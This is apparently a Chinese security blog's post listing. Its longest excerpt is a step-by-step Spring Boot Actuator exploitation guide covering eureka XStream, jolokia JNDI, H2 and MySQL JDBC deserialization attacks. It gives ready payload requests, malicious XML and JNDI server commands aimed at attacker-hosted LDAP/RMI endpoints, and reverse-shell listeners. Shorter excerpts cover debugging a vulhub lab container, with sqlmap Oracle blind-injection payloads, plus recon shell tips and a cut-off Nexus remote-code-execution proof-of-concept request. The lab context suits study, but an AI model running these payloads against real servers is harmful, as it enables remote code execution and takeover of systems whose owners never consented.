  • 目标使用的 eureka-client < 1.8.7(通常包含在 spring-cloud-starter-netflix-eureka-client 依赖中)
  • 目标可以请求攻击者的 HTTP 服务器(请求可出外网)

利用方法:

步骤一:架设响应恶意 XStream payload 的网站

提供一个依赖 Flask 并符合要求的 python 脚本示例,作用是利用目标 Linux 机器上自带的 python 来反弹shell。

使用 python 在自己控制的服务器上运行以上的脚本,并根据实际情况修改脚本中反弹 shell 的 ip 地址和 端口号。

步骤二:监听反弹 shell 的端口

一般使用 nc 监听端口,等待反弹 shell

nc -lvp 443
步骤三:设置 eureka.client.serviceUrl.defaultZone 属性

spring 1.x

POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://your-vps-ip/example

spring 2.x

POST /actuator/env
Content-Type: application/json

{"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/example"}
步骤四:刷新配置

spring 1.x

POST /refresh
Content-Type: application/x-www-form-urlencoded

spring 2.x

POST /actuator/refresh
Content-Type: application/json

漏洞原理:

  1. eureka.client.serviceUrl.defaultZone 属性被设置为恶意的外部 eureka server URL 地址
  2. refresh 触发目标机器请求远程 URL,提前架设的 fake eureka server 就会返回恶意的 payload
  3. 目标机器相关依赖解析 payload,触发 XStream 反序列化,造成 RCE 漏洞

漏洞分析:

Spring Boot Actuator从未授权访问到getshell

漏洞环境:

repository/springboot-eureka-xstream-rce

正常访问:

http://127.0.0.1:9093/env

0x04:jolokia logback JNDI RCE

利用条件:

  • 目标网站存在 /jolokia/actuator/jolokia 接口
  • 目标使用了 jolokia-core 依赖(版本要求暂未知)并且环境中存在相关 MBean
  • 目标可以请求攻击者的 HTTP 服务器(请求可出外网)

  • JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP 方式)

利用方法:

步骤一:查看已存在的 MBeans

访问 /jolokia/list 接口,查看是否存在 ch.qos.logback.classic.jmx.JMXConfiguratorreloadByURL 关键词。

步骤二:托管 xml 文件

在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443)

# 使用 python 快速开启 http server

python2 -m SimpleHTTPServer 80
python3 -m http.server 80

在根目录放置以 xml 结尾的 example.xml 文件,内容如下:

<configuration>
  <insertFromJNDI env-entry-name="ldap://your-vps-ip:1389/JNDIObject" as="appName" />
</configuration>
步骤三:准备要执行的 Java 代码

编写优化过后的用来反弹 shell 的 Java 示例代码 JNDIObject.java

使用兼容低版本 jdk 的方式编译:

javac -source 1.5 -target 1.5 JNDIObject.java

然后将生成的 JNDIObject.class 文件拷贝到 步骤二 中的网站根目录。

步骤四:架设恶意 ldap 服务

下载 marshalsec ,使用下面命令架设对应的 ldap 服务:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389
步骤五:监听反弹 shell 的端口

一般使用 nc 监听端口,等待反弹 shell

nc -lv 443
步骤六:从外部 URL 地址加载日志配置文件

⚠️ 如果目标成功请求了example.xml 并且 marshalsec 也接收到了目标请求,但是目标没有请求 JNDIObject.class,大概率是因为目标环境的 jdk 版本太高,导致 JNDI 利用失败。

替换实际的 your-vps-ip 地址访问 URL 触发漏洞:

/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/your-vps-ip!/example.xml

漏洞原理:

  1. 直接访问可触发漏洞的 URL,相当于通过 jolokia 调用 ch.qos.logback.classic.jmx.JMXConfigurator 类的 reloadByURL 方法
  2. 目标机器请求外部日志配置文件 URL 地址,获得恶意 xml 文件内容
  3. 目标机器使用 saxParser.parse 解析 xml 文件 (这里导致了 xxe 漏洞)
  4. xml 文件中利用 logback 依赖的 insertFormJNDI 标签,设置了外部 JNDI 服务器地址
  5. 目标机器请求恶意 JNDI 服务器,导致 JNDI 注入,造成 RCE 漏洞

漏洞分析:

spring boot actuator rce via jolokia

漏洞环境:

repository/springboot-jolokia-logback-rce

正常访问:

http://127.0.0.1:9094/env

0x05:jolokia Realm JNDI RCE

利用条件:

  • 目标网站存在 /jolokia/actuator/jolokia 接口
  • 目标使用了 jolokia-core 依赖(版本要求暂未知)并且环境中存在相关 MBean
  • 目标可以请求攻击者的服务器(请求可出外网)
  • JNDI 注入受目标 JDK 版本影响,jdk < 6u141/7u131/8u121(RMI 方式)

利用方法:

步骤一:查看已存在的 MBeans

访问 /jolokia/list 接口,查看是否存在 type=MBeanFactorycreateJNDIRealm 关键词。

步骤二:准备要执行的 Java 代码

编写优化过后的用来反弹 shell 的 Java 示例代码 JNDIObject.java

步骤三:托管 class 文件

在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443)

# 使用 python 快速开启 http server

python2 -m SimpleHTTPServer 80
python3 -m http.server 80

步骤二中编译好的 class 文件拷贝到 HTTP 服务器根目录。

步骤四:架设恶意 rmi 服务

下载 marshalsec ,使用下面命令架设对应的 rmi 服务:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://your-vps-ip:80/#JNDIObject 1389
步骤五:监听反弹 shell 的端口

一般使用 nc 监听端口,等待反弹 shell

nc -lvp 443
步骤六:发送恶意 payload

根据实际情况修改 springboot-realm-jndi-rce.py 脚本中的目标地址,RMI 地址、端口等信息,然后在自己控制的服务器上运行。

漏洞原理:

  1. 利用 jolokia 调用 createJNDIRealm 创建 JNDIRealm
  2. 设置 connectionURL 地址为 RMI Service URL
  3. 设置 contextFactory 为 RegistryContextFactory
  4. 停止 Realm
  5. 启动 Realm 以触发指定 RMI 地址的 JNDI 注入,造成 RCE 漏洞

漏洞分析:

Yet Another Way to Exploit Spring Boot Actuators via Jolokia

漏洞环境:

repository/springboot-jolokia-logback-rce

正常访问:

http://127.0.0.1:9094/env

0x06:h2 database query RCE

利用条件:

  • 可以 POST 请求目标网站的 /env 接口设置属性
  • 可以 POST 请求目标网站的 /restart 接口重启应用(存在 spring-boot-starter-actuator 依赖)
  • 存在 com.h2database.h2 依赖(版本要求暂未知)

利用方法:

步骤一:设置 spring.datasource.hikari.connection-test-query 属性

⚠️ 下面payload 中的 ‘T5’ 方法每一次执行命令后都需要更换名称 (如 T6) ,然后才能被重新创建使用,否则下次 restart 重启应用时漏洞不会被触发

spring 1.x(无回显执行命令)

POST /env
Content-Type: application/x-www-form-urlencoded

spring.datasource.hikari.connection-test-query=CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');

spring 2.x(无回显执行命令)

POST /actuator/env
Content-Type: application/json

{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');"}
步骤二:重启应用

spring 1.x

POST /restart
Content-Type: application/x-www-form-urlencoded

spring 2.x

POST /actuator/restart
Content-Type: application/json

漏洞原理:

  1. spring.datasource.hikari.connection-test-query 属性被设置为一条恶意的 CREATE ALIAS 创建自定义函数的 SQL 语句
  2. 其属性对应 HikariCP 数据库连接池的 connectionTestQuery 配置,定义一个新数据库连接之前被执行的 SQL 语句
  3. restart 重启应用,会建立新的数据库连接
  4. 如果 SQL 语句中的自定义函数还没有被执行过,那么自定义函数就会被执行,造成 RCE 漏洞

漏洞分析:

remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database

漏洞环境:

repository/springboot-h2-database-rce

正常访问:

http://127.0.0.1:9096/actuator/env

0x07:h2 database console JNDI RCE

利用条件:

  • 存在 com.h2database.h2 依赖(版本要求暂未知)
  • spring 配置中启用 h2 console spring.h2.console.enabled=true
  • 目标可以请求攻击者的服务器(请求可出外网)
  • JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP 方式)

利用方法:

步骤一:访问路由获得 jsessionid

直接访问目标开启 h2 console 的默认路由 /h2-console,目标会跳转到页面 /h2-console/login.jsp?jsessionid=xxxxxx,记录下实际的 jsessionid=xxxxxx 值。

步骤二:准备要执行的 Java 代码

编写优化过后的用来反弹 shell 的 Java 示例代码 JNDIObject.java

使用兼容低版本 jdk 的方式编译:

javac -source 1.5 -target 1.5 JNDIObject.java

然后将生成的 JNDIObject.class 文件拷贝到 步骤二 中的网站根目录。

步骤三:托管 class 文件

在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443)

# 使用 python 快速开启 http server

python2 -m SimpleHTTPServer 80
python3 -m http.server 80

步骤二中编译好的 class 文件拷贝到 HTTP 服务器根目录。

步骤四:架设恶意 ldap 服务

下载 marshalsec ,使用下面命令架设对应的 ldap 服务:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389
步骤五:监听反弹 shell 的端口

一般使用 nc 监听端口,等待反弹 shell

nc -lv 443
步骤六:发包触发 JNDI 注入

根据实际情况,替换下面数据中的 jsessionid=xxxxxxwww.example.comldap://your-vps-ip:1389/JNDIObject

POST /h2-console/login.do?jsessionid=xxxxxx
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.example.com/h2-console/login.jsp?jsessionid=xxxxxx

language=en&setting=Generic+H2+%28Embedded%29&name=Generic+H2+%28Embedded%29&driver=javax.naming.InitialContext&url=ldap://your-vps-ip:1389/JNDIObject&user=&password=

漏洞分析:

Spring Boot + H2数据库JNDI注入

漏洞环境:

repository/springboot-h2-database-rce

正常访问:

http://127.0.0.1:9096/h2-console

0x08:mysql jdbc deserialization RCE

利用条件:

  • 可以 POST 请求目标网站的 /env 接口设置属性
  • 可以 POST 请求目标网站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)
  • 目标环境中存在 mysql-connector-java 依赖
  • 目标可以请求攻击者的服务器(请求可出外网)

利用方法:

步骤一:查看环境依赖

GET 请求 /env/actuator/env,搜索环境变量(classpath)中是否有 mysql-connector-java 关键词,并记录下其版本号(5.x 或 8.x);

搜索并观察环境变量中是否存在常见的反序列化 gadget 依赖,比如 commons-collectionsJdk7u21Jdk8u20 等;

搜索 spring.datasource.url 关键词,记录下其 value 值,方便后续恢复其正常 jdbc url 值。

步骤二:架设恶意 rogue mysql server

在自己控制的服务器上运行 springboot-jdbc-deserialization-rce.py 脚本,并使用 ysoserial 自定义要执行的命令:

java -jar ysoserial.jar CommonsCollections3 calc > payload.ser

在脚本同目录下生成 payload.ser 反序列化 payload 文件,供脚本使用。

步骤三:设置 spring.datasource.url 属性

⚠️ 修改此属性会暂时导致网站所有的正常数据库服务不可用,会对业务造成影响,请谨慎操作!

mysql-connector-java 5.x 版本设置属性值为:

jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&useSSL=false&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true

mysql-connector-java 8.x 版本设置属性值为:

jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true

spring 1.x

POST /env
Content-Type: application/x-www-form-urlencoded

spring.datasource.url=对应属性值

spring 2.x

POST /actuator/env
Content-Type: application/json

{"name":"spring.datasource.url","value":"对应属性值"}
步骤四:刷新配置

spring 1.x

POST /refresh
Content-Type: application/x-www-form-urlencoded

spring 2.x

POST /actuator/refresh
Content-Type: application/json

步骤五:触发数据库查询

尝试访问网站已知的数据库查询的接口,例如: /product/list ,或者寻找其他方式,主动触发源网站进行数据库查询,然后漏洞会被触发

步骤六:恢复正常 jdbc url

反序列化漏洞利用完成后,使用 步骤三 的方法恢复 步骤一 中记录的 spring.datasource.url 的原始 value

漏洞原理:

  1. spring.datasource.url 属性被设置为外部恶意 mysql jdbc url 地址
  2. refresh 刷新后设置了一个新的 spring.datasource.url 属性值
  3. 当网站进行数据库查询等操作时,会尝试使用恶意 mysql jdbc url 建立新的数据库连接
  4. 然后恶意 mysql server 就会在建立连接的合适阶段返回反序列化 payload 数据
  5. 目标依赖的 mysql-connector-java 就会反序列化设置好的 gadget,造成 RCE 漏洞

漏洞分析:

New-Exploit-Technique-In-Java-Deserialization-Attack

漏洞环境:

需要配置 application.properties 中的 spring.datasource.url、spring.datasource.username、spring.datasource.password,保证可以正常连上 mysql 数据库,否则程序启动时就会报错退出

repository/springboot-mysql-jdbc-rce

正常访问:

http://127.0.0.1:9097/actuator/env

发送完 payload 后触发漏洞:

http://127.0.0.1:9097/product/list

[Read More]

最近在做靶场漏洞复现的时候发现了一个由web虚拟机和db虚拟机一起跑起来的联动靶场环境,下载完镜像后总是报错,思前想后都没办法,于是只能自己来解决问题,虽然结果令人大失所望,但是过程还是挺让人有成就感的,就记录了一下。

#docker启服务

进入相对应的靶场环境文件夹下起靶场:

bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker-compose up -d
Creating network "cve-2020-9402_default" with the default driver
Creating cve-2020-9402_db_1 ... done
Creating cve-2020-9402_web_1 ... done
bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker-compose ps
       Name                      Command               State              Ports            
-------------------------------------------------------------------------------------------
cve-2020-9402_db_1    /entrypoint.sh                   Up      1521/tcp, 5500/tcp, 8080/tcp
cve-2020-9402_web_1   /docker-entrypoint.sh pyth ...   Up      0.0.0.0:8000->8000/tcp 

我们可以看到对应web服务的端口监听状态:0.0.0.0:8000->8000/tcp,所以我们直接访问试试看:

bin4xin@bin4xin's MacbookPro CVE-2020-9402 % curl localhost:8000
curl: (52) Empty reply from server
bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker-compose ps  
       Name                      Command               State              Ports            
-------------------------------------------------------------------------------------------
cve-2020-9402_db_1    /entrypoint.sh                   Up      1521/tcp, 5500/tcp, 8080/tcp
cve-2020-9402_web_1   /docker-entrypoint.sh pyth ...   Up      0.0.0.0:8000->8000/tcp 


bin4xin@bin4xin's MacbookPro CVE-2020-9402 % curl 127.0.0.1:8000/vuln
curl: (52) Empty reply from server
bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker-compose ps       
       Name                      Command               State              Ports            
-------------------------------------------------------------------------------------------
cve-2020-9402_db_1    /entrypoint.sh                   Up      1521/tcp, 5500/tcp, 8080/tcp
cve-2020-9402_web_1   /docker-entrypoint.sh pyth ...   Up      0.0.0.0:8000->8000/tcp 

在上面的bash终端代码我们可以看到,我们访问8000端口服务,都是返回Empty reply from server,我就很郁闷了,明明docker显示状态是Up状态,怎么访问时服务返回空呢。

#排错

#这是一个有脾气的容器

还是不甘心,看了一下本地的ip地址,再次访问看看:

bin4xin@bin4xin's MacbookPro shiro % ifconfig|grep inet                                                  
	inet 127.0.0.1 netmask 0xff000000 
	inet6 ::1 prefixlen 128 
	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1 
	inet6 fe80::aede:48ff:fe00:1122%en5 prefixlen 64 scopeid 0x7 
	inet6 fe80::146d:ed67:817a:e134%en0 prefixlen 64 secured scopeid 0x9 
	inet 114.97.221.67 netmask 0xfffffe00 broadcast 114.97.221.255
	inet6 fe80::24e6:3dff:fe1c:7c55%awdl0 prefixlen 64 scopeid 0x10 
	inet6 fe80::24e6:3dff:fe1c:7c55%llw0 prefixlen 64 scopeid 0x11 
	inet6 fe80::9a9a:9906:8f8d:5e0%utun0 prefixlen 64 scopeid 0x12 
	inet6 fe80::8ef2:d44b:f2b0:f37e%utun1 prefixlen 64 scopeid 0x13 

en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	inet 114.97.221.67

bin4xin@bin4xin's MacbookPro shiro % curl http://114.97.221.67:8000/vuln
curl: (7) Failed to connect to 114.97.221.67 port 8000: Connection refused

bin4xin@bin4xin's MacbookPro shiro % docker-compose ps                  
       Name                      Command                 State                 Ports            
------------------------------------------------------------------------------------------------
cve-2020-9402_db_1    /entrypoint.sh                   Up           1521/tcp, 5500/tcp, 8080/tcp
cve-2020-9402_web_1   /docker-entrypoint.sh pyth ...   Restarting 

好家伙,这次直接web服务重启了,有脾气。没办法,直接把整个环境down掉重启。

#进容器

这次我想到的办法是直接进容器里面去看看服务到底发生了什么:

docker ps

a66976bc6d2b        cve-2020-9402_web      "/docker-entrypoint.…"   4 seconds ago       Up 3 seconds        0.0.0.0:8000->8000/tcp         cve-2020-9402_web_1
fc99758ce428        vulhub/oracle:12c-ee   "/entrypoint.sh"         5 seconds ago       Up 3 seconds        1521/tcp, 5500/tcp, 8080/tcp   cve-2020-9402_db_1

我们可以通过docker ps来查看docker镜像cve-2020-9402_web对应的CONTAINER ID,通过这个id值进入容器;

bin4xin@bin4xin's MacbookPro CVE-2020-9402 % sudo docker exec -it a66976bc6d2b /bin/bash
root@a66976bc6d2b:/usr/src# 
root@a66976bc6d2b:/usr/src# ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 06:44 ?        00:00:00 /bin/bash /docker-entrypoint.sh python manage.py runserver 0.0.0.0:8000
root         7     1  0 06:44 ?        00:00:00 bash /usr/local/bin/wait-for-it.sh -t 0 db:1521 -- echo oracle is up
root        56     0  0 06:45 pts/0    00:00:00 /bin/bash
root        73     7  0 06:45 ?        00:00:00 sleep 1
root        74    56  0 06:45 pts/0    00:00:00 ps -ef

看了一下,没什么大问题啊,服务该照常启动的都启动了,难道是db服务的问题?就在我疑惑的时候,果然:容器又重启了,我的shell直接掉了,查看一下状态,可不咋地,又restart了,心里苦阿。

bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker ps

CONTAINER ID        IMAGE                  COMMAND                  CREATED             STATUS                         PORTS                          NAMES
a66976bc6d2b        cve-2020-9402_web      "/docker-entrypoint.…"   2 minutes ago       Restarting (1) 2 seconds ago

#日志排错:-)

排错之前看一下docker的打印日志指南

% docker logs --help

Usage:  docker logs [OPTIONS] CONTAINER

Fetch the logs of a container

Options:
      --details        Show extra details provided to logs
  -f, --follow         Follow log output
      --since string   Show logs since timestamp (e.g. 2013-01-02T13:23:37) or relative (e.g. 42m for 42 minutes)
      --tail string    Number of lines to show from the end of the logs (default "all")
  -t, --timestamps     Show timestamps
      --until string   Show logs before a timestamp (e.g. 2013-01-02T13:23:37) or relative (e.g. 42m for 42 minutes)

我们可以看到,f参数对应的是log查看的容器id,而我的需求是,对应查看某一个时间段之后的db虚拟机的日志,所以生成命令:docker logs --since 2020-09-11T14:50:00 -f b5731d06d3ea web的日志:

bin4xin@bin4xin's MacbookPro shiro % docker logs --since 2020-09-11T14:40:00  -f ae715c332e7e
+ cd /usr/src
+ wait-for-it.sh -t 0 db:1521 -- echo 'oracle is up'
wait-for-it.sh: waiting for db:1521 without a timeout
wait-for-it.sh: db:1521 is available after 60 seconds
oracle is up

我们可以看到没有任何报错;继续,看下面的报错:

+ python manage.py makemigrations
Traceback (most recent call last):
  File "/usr/local/lib/python3.6/site-packages/django/db/backends/base/base.py", line 220, in ensure_connection
    self.connect()
  File "/usr/local/lib/python3.6/site-packages/django/utils/asyncio.py", line 26, in inner
    return func(*args, **kwargs)
  File "/usr/local/lib/python3.6/site-packages/django/db/backends/base/base.py", line 197, in connect
    self.connection = self.get_new_connection(conn_params)
  File "/usr/local/lib/python3.6/site-packages/django/utils/asyncio.py", line 26, in inner
    return func(*args, **kwargs)
  File "/usr/local/lib/python3.6/site-packages/django/db/backends/oracle/base.py", line 232, in get_new_connection
    **conn_params,
cx_Oracle.DatabaseError: ORA-12505: TNS:listener does not currently know of SID given in connect descriptor


The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "manage.py", line 21, in <module>
    main()
·中间部分省略
·中间部分省略
·中间部分省略
    **conn_params,
django.db.utils.DatabaseError: ORA-12505: TNS:listener does not currently know of SID given in connect descriptor

查看报错是db的报错,赶紧看看db虚拟机的日志情况docker logs --since 2020-09-11T14:40:00 -f b32b16e34b6c db:

ls: cannot access /u01/app/oracle/oradata/orcl: No such file or directory
No databases found in /u01/app/oracle/oradata/orcl. About to create a new database instance
Starting database listener

LSNRCTL for Linux: Version 12.1.0.2.0 - Production on 11-SEP-2020 06:54:05

Copyright (c) 1991, 2014, Oracle.  All rights reserved.

Starting /u01/app/oracle/product/12.1.0.2/dbhome_1/bin/tnslsnr: please wait...

TNSLSNR for Linux: Version 12.1.0.2.0 - Production
System parameter file is /u01/app/oracle/product/12.1.0.2/dbhome_1/network/admin/listener.ora
Log messages written to /u01/app/oracle/diag/tnslsnr/b32b16e34b6c/listener/alert/log.xml
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=b32b16e34b6c)(PORT=1521)))

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=b32b16e34b6c)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias                     LISTENER
Version                   TNSLSNR for Linux: Version 12.1.0.2.0 - Production
Start Date                11-SEP-2020 06:54:05
Uptime                    0 days 0 hr. 0 min. 0 sec
Trace Level               off
Security                  ON: Local OS Authentication
SNMP                      OFF
Listener Parameter File   /u01/app/oracle/product/12.1.0.2/dbhome_1/network/admin/listener.ora
Listener Log File         /u01/app/oracle/diag/tnslsnr/b32b16e34b6c/listener/alert/log.xml
Listening Endpoints Summary...
  (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=b32b16e34b6c)(PORT=1521)))
The listener supports no services
The command completed successfully
Copying database files
1% complete
3% complete
11% complete
18% complete

数据库服务似乎已经启动起来了,但是数据库文件还在复制过程中:Copying database files,那就等待文件复制完成试试看是不是复制文件的行为。

100% complete
Look at the log file "/u01/app/oracle/cfgtoollogs/dbca/orcl/orcl.log" for further details.

LSNRCTL for Linux: Version 12.1.0.2.0 - Production on 11-SEP-2020 07:00:33

Copyright (c) 1991, 2014, Oracle.  All rights reserved.

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=b32b16e34b6c)(PORT=1521)))
The command completed successfully
Database has been created in /u01/app/oracle/oradata/orcl
SYS and SYSTEM passwords are set to [oracle]
Setting HTTP port to 8080

PL/SQL procedure successfully completed.

Please login to http://<ip_address>:8080/em to use enterprise manager
User: sys; Password oracle; Sysdba: true
Fixing permissions...
Running init scripts...
Init scripts in /oracle.init.d/: Ignoring /oracle.init.d/*

Done with scripts we are ready to go

难道是因为db的原因导致web服务报错,而且恰好报错是oracle数据库的错,而又恰好我们看日志时是存在这样的情况的。返回去在看web虚拟机的日志,果然:db虚拟机数据库文件拷贝完成后,这边web虚拟机重启后启动服务就没有报错了,服务跑在8000端口。

+ cd /usr/src
+ wait-for-it.sh -t 0 db:1521 -- echo 'oracle is up'
wait-for-it.sh: waiting for db:1521 without a timeout
wait-for-it.sh: db:1521 is available after 0 seconds
oracle is up
+ python manage.py makemigrations
Migrations for 'vuln':
  vuln/migrations/0001_initial.py
    - Create model Names
    - Create model Collection
    - Create model Collection2
+ python manage.py migrate
Operations to perform:
  Apply all migrations: admin, auth, contenttypes, sessions, vuln
Running migrations:
  Applying contenttypes.0001_initial... OK
  Applying auth.0001_initial... OK
  Applying admin.0001_initial... OK
  Applying admin.0002_logentry_remove_auto_add... OK
  Applying admin.0003_logentry_add_action_flag_choices... OK
  Applying contenttypes.0002_remove_content_type_name... OK
  Applying auth.0002_alter_permission_name_max_length... OK
  Applying auth.0003_alter_user_email_max_length... OK
  Applying auth.0004_alter_user_username_opts... OK
  Applying auth.0005_alter_user_last_login_null... OK
  Applying auth.0006_require_contenttypes_0002... OK
  Applying auth.0007_alter_validators_add_error_messages... OK
  Applying auth.0008_alter_user_username_max_length... OK
  Applying auth.0009_alter_user_last_name_max_length... OK
  Applying auth.0010_alter_group_name_max_length... OK
  Applying auth.0011_update_proxy_permissions... OK
  Applying sessions.0001_initial... OK
  Applying vuln.0001_initial... OK
+ python manage.py loaddata collection.json
Installed 8 object(s) from 1 fixture(s)
+ python manage.py shell -c 'from django.contrib.auth.models import User; User.objects.create_superuser('\''admin'\'', '\''admin@vulhub.org'\'', '\''admin'\'') if not User.objects.filter(username='\''admin'\'').exists() else 0'
+ exec python manage.py runserver 0.0.0.0:8000

#令人失望的结果

exec python manage.py runserver 0.0.0.0:8000看到这个日志打印出来,觉得好像确实没有什么问题了,再来查看一下docker的状态。

bin4xin@bin4xin's MacbookPro CVE-2020-9402 % docker-compose ps
       Name                      Command               State              Ports            
-------------------------------------------------------------------------------------------
cve-2020-9402_db_1    /entrypoint.sh                   Up      1521/tcp, 5500/tcp, 8080/tcp
cve-2020-9402_web_1   /docker-entrypoint.sh pyth ...   Up      0.0.0.0:8000->8000/tcp    

看一眼docker的情况,都是up状态。访问一下8000端口终于也可以访问到web服务了,不再是Empty reply from server了。

bin4xin@bin4xin's MacbookPro CVE-2020-9402 % curl localhost:8000
<!DOCTYPE html>
<html lang="en">
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <title>Page not found at /</title>
  <meta name="robots" content="NONE,NOARCHIVE">
  <style type="text/css">
    html * { padding:0; margin:0; }
    body * { padding:10px 20px; }
    body * * { padding:0; }
    body { font:small sans-serif; background:#eee; color:#000; }
    body>div { border-bottom:1px solid #ddd; }
    h1 { font-weight:normal; margin-bottom:.4em; }
    h1 span { font-size:60%; color:#666; font-weight:normal; }
    table { border:none; border-collapse: collapse; width:100%; }
    td, th { vertical-align:top; padding:2px 3px; }
    th { width:12em; text-align:right; color:#666; padding-right:.5em; }
    #info { background:#f6f6f6; }
    #info ol { margin: 0.5em 4em; }
    #info ol li { font-family: monospace; }
    #summary { background: #ffc; }
    #explanation { background:#eee; border-bottom: 0px none; }
  </style>

web访问日志:

Watching for file changes with StatReloader
Not Found: /
[11/Sep/2020 07:01:23] "GET / HTTP/1.1" 404 2137

Not Found: /
[11/Sep/2020 07:06:47] "GET / HTTP/1.1" 404 2141
---
Parameter: q (GET)
    Type: boolean-based blind
    Title: Oracle boolean-based blind - Parameter replace
    Payload: q=(SELECT (CASE WHEN (6457=6457) THEN 6457 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

    Type: time-based blind
    Title: Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)
    Payload: q=(SELECT (CASE WHEN (6135=6135) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(74)||CHR(88)||CHR(115),5) ELSE 6135 END) FROM DUAL)
---
[15:22:11] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle

[Read More]

「技巧」:linux&unix Terminal小技巧

Sep 1, 2020. | By: Bin4xin

grep

  • grep -n “get_spg2lsf” -r ./

在当前文件夹下查找包含”get_spg2lsf”字符串的文件

vim

快速删除

1、删除每行前10个字符:

  • :%s/^.{10}//

其中,%表示所有行,s表示替换,”%s”可用”1,$”代替(下同);

正则表达式”/^.{10}//”中,^表示行首;”.”表示要删除的字符个数,”.{10}“表示删除10个字符,可用10个”.”表示;

2、删除每行后10个字符

  • :%s/.{10}$//

字符串替换

vi/vim 中可以使用 :s 命令来替换字符串。

  :s/vivian/sky/ 替换当前行第一个 vivian 为 sky

  :s/vivian/sky/g 替换当前行所有 vivian 为 sky

  :n,$s/vivian/sky/ 替换第 n 行开始到最后一行中每一行的第一个 vivian 为 sky

  :n,$s/vivian/sky/g 替换第 n 行开始到最后一行中每一行所有 vivian 为 sky

awk

在实际信息搜集过程中遇到的问题:

现在有一个hosts文件,其中包含了所需要信息搜集的域名和ip地址,其格式如下存储: domain.com.cn,1.1.1.1

首先按照信息搜集的方式第一步我是先过一遍ip或域名的端口,所以问题就来了。 nmap不支持这种形式进行文件内容读取,需以一行一数据的形式,就是:

domain.com.cn1
ip1
domain.com.cn2
ip2

不管是域名还是ip地址都是以这样的形式来读取才能使用-iL参数来读取指定的域名或ip,最后实现我们的端口扫描任务,所以是需要以逗号为界限,将两列数据分成两个文件;

故我们构思一下思路:以逗号为标示,把前面一列和后面一列分别使用参数$1,$2来表示,将$1输出到domain1.txt,$2输出到domain2.txt中。

[Read More]

只是简单记录一下关于这个管理软件的poc代码;

POST /service/extdirect HTTP/1.1
Host: vuln_ip
sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json; charset=UTF-8
Content-Length: 7249

{"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   